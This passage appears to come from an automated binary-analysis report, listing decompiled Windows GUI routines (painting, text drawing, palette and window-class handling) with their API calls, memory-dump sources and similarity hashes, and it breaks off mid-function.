                                                                        • Instruction Fuzzy Hash: 91318470B04214AFDB11FB69DC85B8B77E9EF45314F5140BAF908EB292CB79AD009768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043A97C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				struct tagPAINTSTRUCT _v84;
                                                                        				intOrPtr _t55;
                                                                        				void* _t64;
                                                                        				struct HDC__* _t75;
                                                                        				intOrPtr _t84;
                                                                        				void* _t95;
                                                                        				void* _t96;
                                                                        				void* _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				intOrPtr _t102;
                                                                        
                                                                        				_t100 = _t101;
                                                                        				_t102 = _t101 + 0xffffffb0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t75 =  *(_v12 + 4);
                                                                        				if(_t75 == 0) {
                                                                        					_t75 = BeginPaint(E0043CC2C(_v8),  &_v84);
                                                                        				}
                                                                        				_push(_t100);
                                                                        				_push(0x43aa9c);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t102;
                                                                        				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                        					_v20 = SaveDC(_t75);
                                                                        					_v16 = 2;
                                                                        					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                        					if(_t95 >= 0) {
                                                                        						_t96 = _t95 + 1;
                                                                        						_t98 = 0;
                                                                        						do {
                                                                        							_t64 = E00414208( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                        							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                        								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                        									goto L11;
                                                                        								} else {
                                                                        									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                        									if(_v16 != 1) {
                                                                        										goto L11;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								goto L11;
                                                                        							}
                                                                        							goto L12;
                                                                        							L11:
                                                                        							_t98 = _t98 + 1;
                                                                        							_t96 = _t96 - 1;
                                                                        						} while (_t96 != 0);
                                                                        					}
                                                                        					L12:
                                                                        					if(_v16 != 1) {
                                                                        						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                        					}
                                                                        					RestoreDC(_t75, _v20);
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                        				}
                                                                        				E0043AAD8(_v8, 0, _t75);
                                                                        				_pop(_t84);
                                                                        				 *[fs:eax] = _t84;
                                                                        				_push(0x43aaa3);
                                                                        				_t55 = _v12;
                                                                        				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                        					return EndPaint(E0043CC2C(_v8),  &_v84);
                                                                        				}
                                                                        				return _t55;
                                                                        			}



















                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                        • SaveDC.GDI32(?), ref: 0043A9D6
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043AA38
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AA62
                                                                        • EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 3808407030-0
                                                                        • Opcode ID: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction ID: 981de1faad7e270c48b42c82777b4bfcd2244b1cbce74977eaa2f3e787f6203c
                                                                        • Opcode Fuzzy Hash: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction Fuzzy Hash: 70417F71A002049FDB00EF99C984FAEB7F9EF4C304F2590AAE544AB362D7399D51CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00467AF0(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				int _t17;
                                                                        				CHAR* _t19;
                                                                        				int _t31;
                                                                        				CHAR* _t33;
                                                                        				int _t43;
                                                                        				CHAR* _t45;
                                                                        				void* _t49;
                                                                        				signed int _t56;
                                                                        				int _t57;
                                                                        				void* _t61;
                                                                        
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t60 = __ecx;
                                                                        				_t49 = __edx;
                                                                        				_t56 = _a4;
                                                                        				E0041FD6C( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                                                                        				if(_a8 != 1) {
                                                                        					_t57 = _t56 | 0x00000005;
                                                                        					__eflags = _t57;
                                                                        					_t17 = E00404600(__ecx);
                                                                        					_t19 = E004047F8(__ecx);
                                                                        					return DrawTextA(E00420730(_t49), _t19, _t17,  &_v20, _t57);
                                                                        				}
                                                                        				OffsetRect( &_v20, 1, 1);
                                                                        				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
                                                                        				_t31 = E00404600(_t60);
                                                                        				_t33 = E004047F8(_t60);
                                                                        				DrawTextA(E00420730(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                                                                        				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                                                        				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
                                                                        				_t43 = E00404600(_t60);
                                                                        				_t45 = E004047F8(_t60);
                                                                        				return DrawTextA(E00420730(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                                                                        			}

















                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00467B26
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B5A
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00467B67
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B99
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction ID: 216688b682b8187a4d0dd2772e2fd5db348bcfabf5300b79facba910a8da82e7
                                                                        • Opcode Fuzzy Hash: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction Fuzzy Hash: 5921A4B1B0412967CB00FB6A9C81E9F72AD9F45328B11053EB918F7282DA7DE80547AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045620C(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t20;
                                                                        				void* _t30;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				struct HWND__** _t34;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t36;
                                                                        
                                                                        				_t31 = __ecx;
                                                                        				_t34 = __edx;
                                                                        				_t33 = __eax;
                                                                        				_t30 = 0;
                                                                        				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                        				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                        					L16:
                                                                        					return _t30;
                                                                        				} else {
                                                                        					_t35 = GetCapture();
                                                                        					if(_t35 != 0) {
                                                                        						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x496714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                        							_t30 = 1;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        					_t36 =  *_t34;
                                                                        					_t2 = _t33 + 0x44; // 0x0
                                                                        					_t20 =  *_t2;
                                                                        					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                        						L7:
                                                                        						if(E004334C0(_t36, _t31) == 0 && _t36 != 0) {
                                                                        							_t36 = GetParent(_t36);
                                                                        							goto L7;
                                                                        						}
                                                                        						if(_t36 == 0) {
                                                                        							_t36 =  *_t34;
                                                                        						}
                                                                        						goto L11;
                                                                        					} else {
                                                                        						_t36 = E0043CC2C(_t20);
                                                                        						L11:
                                                                        						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                        							_t30 = 1;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$CaptureLongWindow
                                                                        • String ID:
                                                                        • API String ID: 1158686931-0
                                                                        • Opcode ID: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction ID: 5d2c23152084b1fa4b612b1933836b5cb434e24660daf083a54e060d56ea4212
                                                                        • Opcode Fuzzy Hash: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction Fuzzy Hash: 351181712046095FDA20BA99C980E5373DCDB25315F5204BAFD5AD7353EB2DFC084768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00424C34(struct HPALETTE__* __eax) {
                                                                        				struct HPALETTE__* _t21;
                                                                        				char _t28;
                                                                        				signed int _t30;
                                                                        				struct HPALETTE__* _t36;
                                                                        				struct HPALETTE__* _t37;
                                                                        				struct HDC__* _t38;
                                                                        				intOrPtr _t39;
                                                                        
                                                                        				_t21 = __eax;
                                                                        				_t36 = __eax;
                                                                        				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                                                        					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                                                        					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                                                        						E004235B4(_t22);
                                                                        					}
                                                                        					_t21 = E00421218( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                                                        					_t37 = _t21;
                                                                        					 *(_t39 + 0x10) = _t37;
                                                                        					if(_t37 == 0) {
                                                                        						_push(0);
                                                                        						L00406EB4();
                                                                        						_t21 = E00420B28(_t21);
                                                                        						_t38 = _t21;
                                                                        						if( *((char*)(_t39 + 0x71)) != 0) {
                                                                        							L9:
                                                                        							_t28 = 1;
                                                                        						} else {
                                                                        							_push(0xc);
                                                                        							_push(_t38);
                                                                        							L00406B8C();
                                                                        							_push(0xe);
                                                                        							_push(_t38);
                                                                        							L00406B8C();
                                                                        							_t30 = _t21 * _t21;
                                                                        							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                                                        							if(_t30 < _t21) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								_t28 = 0;
                                                                        							}
                                                                        						}
                                                                        						 *((char*)(_t39 + 0x71)) = _t28;
                                                                        						if(_t28 != 0) {
                                                                        							_t21 = CreateHalftonePalette(_t38);
                                                                        							 *(_t39 + 0x10) = _t21;
                                                                        						}
                                                                        						_push(_t38);
                                                                        						_push(0);
                                                                        						L00407124();
                                                                        						if( *(_t39 + 0x10) == 0) {
                                                                        							 *((char*)(_t36 + 0x30)) = 1;
                                                                        							return _t21;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}











                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                        • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                        • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                        • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: B380CreateHalftonePalette
                                                                        • String ID:
                                                                        • API String ID: 178651289-0
                                                                        • Opcode ID: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction ID: b38cbdc5d7d635c132f023a64b9ee6869dab09140c7ce5dbab682903523af89d
                                                                        • Opcode Fuzzy Hash: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction Fuzzy Hash: 8611A2217026799ADB20EF2AE4417EA3AD0EF91359F420126F9009B781D7B89994C3A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00453968(void* __eax) {
                                                                        				void* _t16;
                                                                        				void* _t37;
                                                                        				void* _t38;
                                                                        				signed int _t41;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				_t38 = __eax;
                                                                        				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x47aafc != 0) {
                                                                        					_t16 = E0043CF30(__eax);
                                                                        					if(_t16 != 0) {
                                                                        						_t41 = GetWindowLongA(E0043CC2C(_t38), 0xffffffec);
                                                                        						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
                                                                        							if((_t41 & 0x00080000) == 0) {
                                                                        								SetWindowLongA(E0043CC2C(_t38), 0xffffffec, _t41 | 0x00080000);
                                                                        							}
                                                                        							return  *0x47aafc(E0043CC2C(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0047AB80 |  *0x0047AB88);
                                                                        						} else {
                                                                        							SetWindowLongA(E0043CC2C(_t38), 0xffffffec, _t41 & 0xfff7ffff);
                                                                        							_push(0x485);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							_t37 = E0043CC2C(_t38);
                                                                        							_push(_t37);
                                                                        							L004070FC();
                                                                        							return _t37;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t16;
                                                                        			}








                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 0045399C
                                                                        • SetWindowLongA.USER32 ref: 004539CE
                                                                        • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A08
                                                                        • SetWindowLongA.USER32 ref: 00453A21
                                                                        • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesB330Layered
                                                                        • String ID:
                                                                        • API String ID: 1770052509-0
                                                                        • Opcode ID: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction ID: f4d5327cf6d9d13d20f65eb046940501b950165327f161f479efa226d41080df
                                                                        • Opcode Fuzzy Hash: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction Fuzzy Hash: 6911AB60A042902AEB10BE794CC9B4B3A494B09356F142D7ABD99EB2C3C67CCC49C76D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0041D31C(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				struct HINSTANCE__* _t6;
                                                                        				CHAR* _t8;
                                                                        				struct HINSTANCE__* _t9;
                                                                        				int _t10;
                                                                        				void* _t11;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				CHAR* _t14;
                                                                        				struct HINSTANCE__* _t19;
                                                                        				CHAR* _t20;
                                                                        				struct HWND__* _t22;
                                                                        
                                                                        				_t6 =  *0x496714; // 0x400000
                                                                        				 *0x47a4d0 = _t6;
                                                                        				_t8 =  *0x47a4e4; // 0x41d30c
                                                                        				_t9 =  *0x496714; // 0x400000
                                                                        				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                        				asm("sbb eax, eax");
                                                                        				_t11 = _t10 + 1;
                                                                        				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
                                                                        					if(_t11 != 0) {
                                                                        						_t19 =  *0x496714; // 0x400000
                                                                        						_t20 =  *0x47a4e4; // 0x41d30c
                                                                        						UnregisterClassA(_t20, _t19);
                                                                        					}
                                                                        					RegisterClassA(0x47a4c0);
                                                                        				}
                                                                        				_t13 =  *0x496714; // 0x400000
                                                                        				_t14 =  *0x47a4e4; // 0x41d30c
                                                                        				_t22 = CreateWindowExA(0x80, _t14, 0x41d3cc, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
                                                                        				if(_a6 != 0) {
                                                                        					SetWindowLongA(_t22, 0xfffffffc, E0041D260(_a4, _a8));
                                                                        				}
                                                                        				return _t22;
                                                                        			}















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                        • String ID:
                                                                        • API String ID: 3404767174-0
                                                                        • Opcode ID: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction ID: 74b4939fce1307e55b377de450ca8e826035f92d8163aee15a1af6e20c356675
                                                                        • Opcode Fuzzy Hash: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction Fuzzy Hash: 2C0184B1B041046BCB10EBA8DD85F9E33ACE749308F114177FD18E72D1D67AA9948B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 40%
                                                                        			E00421180(intOrPtr __eax) {
                                                                        				char _v5;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr _t16;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t30;
                                                                        				void* _t32;
                                                                        				void* _t34;
                                                                        				intOrPtr _t35;
                                                                        
                                                                        				_t32 = _t34;
                                                                        				_t35 = _t34 + 0xfffffff8;
                                                                        				_v5 = 0;
                                                                        				if( *0x496a28 == 0) {
                                                                        					return _v5;
                                                                        				} else {
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_v12 = __eax;
                                                                        					_push(_t32);
                                                                        					_push(0x421206);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t35;
                                                                        					_push(0x68);
                                                                        					_t14 = _v12;
                                                                        					_push(_t14);
                                                                        					L00406B8C();
                                                                        					if(_t14 >= 0x10) {
                                                                        						_push(__eax + 4);
                                                                        						_push(8);
                                                                        						_push(0);
                                                                        						_t18 =  *0x496a28; // 0xa3080776
                                                                        						_push(_t18);
                                                                        						L00406BB4();
                                                                        						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                        						_push(8);
                                                                        						_push(8);
                                                                        						_t21 =  *0x496a28; // 0xa3080776
                                                                        						_push(_t21);
                                                                        						L00406BB4();
                                                                        						_v5 = 1;
                                                                        					}
                                                                        					_pop(_t30);
                                                                        					 *[fs:eax] = _t30;
                                                                        					_push(0x42120d);
                                                                        					_t16 = _v12;
                                                                        					_push(_t16);
                                                                        					_push(0);
                                                                        					L00407124();
                                                                        					return _t16;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00421198
                                                                        • 72E7AD70.GDI32(?,00000068,00000000,00421206,?,00000000), ref: 004211B4
                                                                        • 72E7AEA0.GDI32(A3080776,00000000,00000008,?,?,00000068,00000000,00421206,?,00000000), ref: 004211CC
                                                                        • 72E7AEA0.GDI32(A3080776,00000008,00000008,?,A3080776,00000000,00000008,?,?,00000068,00000000,00421206,?,00000000), ref: 004211E4
                                                                        • 72E7B380.USER32(00000000,?,0042120D,00421206,?,00000000), ref: 00421200
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E00462FB4(int __eax) {
                                                                        				int _v8;
                                                                        				int _t20;
                                                                        				int _t22;
                                                                        				intOrPtr _t29;
                                                                        				int _t32;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t36;
                                                                        
                                                                        				_t34 = _t36;
                                                                        				_t22 = __eax;
                                                                        				if( *((char*)(__eax + 0x2e8)) == 1) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_v8 = __eax;
                                                                        					_push(_t34);
                                                                        					_push(0x463039);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t36;
                                                                        					_push(0x48);
                                                                        					_t11 = _v8;
                                                                        					L00406B8C();
                                                                        					_t32 = MulDiv(E0041F6E8( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
                                                                        					 *(_t22 + 0x2b0) = _t32;
                                                                        					E004609B0(_t22, MulDiv(_t32, 0x78, 0x64));
                                                                        					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
                                                                        					_t29 = 0x5a;
                                                                        					 *[fs:eax] = _t29;
                                                                        					_push(0x463040);
                                                                        					_t20 = _v8;
                                                                        					_push(_t20);
                                                                        					_push(0);
                                                                        					L00407124();
                                                                        					return _t20;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 00462FC7
                                                                        • 72E7AD70.GDI32(?,0000005A,00000048,00000000,00463039,?,00000000), ref: 00462FE5
                                                                          • Part of subcall function 0041F6E8: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F6F9
                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462FF4
                                                                        • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00463006
                                                                        • 72E7B380.USER32(00000000,?,00463040,00000000,00000000,?,0000005A,00000048,00000000,00463039,?,00000000), ref: 00463033
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: B380
                                                                        • String ID:
                                                                        • API String ID: 120756276-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00409C5C(void* __esi, void* __eflags) {
                                                                        				char _v8;
                                                                        				intOrPtr* _t18;
                                                                        				intOrPtr _t26;
                                                                        				void* _t27;
                                                                        				long _t29;
                                                                        				intOrPtr _t32;
                                                                        				void* _t33;
                                                                        
                                                                        				_t33 = __eflags;
                                                                        				_push(0);
                                                                        				_push(_t32);
                                                                        				_push(0x409cf3);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t32;
                                                                        				E004099D4(GetThreadLocale(), 0x409d08, 0x100b,  &_v8);
                                                                        				_t29 = E004087C0(0x409d08, 1, _t33);
                                                                        				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                        					EnumCalendarInfoA(E00409BA8, GetThreadLocale(), _t29, 4);
                                                                        					_t27 = 7;
                                                                        					_t18 = 0x49681c;
                                                                        					do {
                                                                        						 *_t18 = 0xffffffff;
                                                                        						_t18 = _t18 + 4;
                                                                        						_t27 = _t27 - 1;
                                                                        					} while (_t27 != 0);
                                                                        					EnumCalendarInfoA(E00409BE4, GetThreadLocale(), _t29, 3);
                                                                        				}
                                                                        				_pop(_t26);
                                                                        				 *[fs:eax] = _t26;
                                                                        				_push(E00409CFA);
                                                                        				return E00404348( &_v8);
                                                                        			}

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409CF3,?,?,00000000), ref: 00409C74
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CF3,?,?,00000000), ref: 00409CA4
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BA8,00000000,00000000,00000004), ref: 00409CAF
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CF3,?,?,00000000), ref: 00409CCD
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 00409CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454F68() {
                                                                        				void* _t2;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        				struct HHOOK__* _t10;
                                                                        
                                                                        				if( *0x496c1c != 0) {
                                                                        					_t10 =  *0x496c1c; // 0x0
                                                                        					UnhookWindowsHookEx(_t10);
                                                                        				}
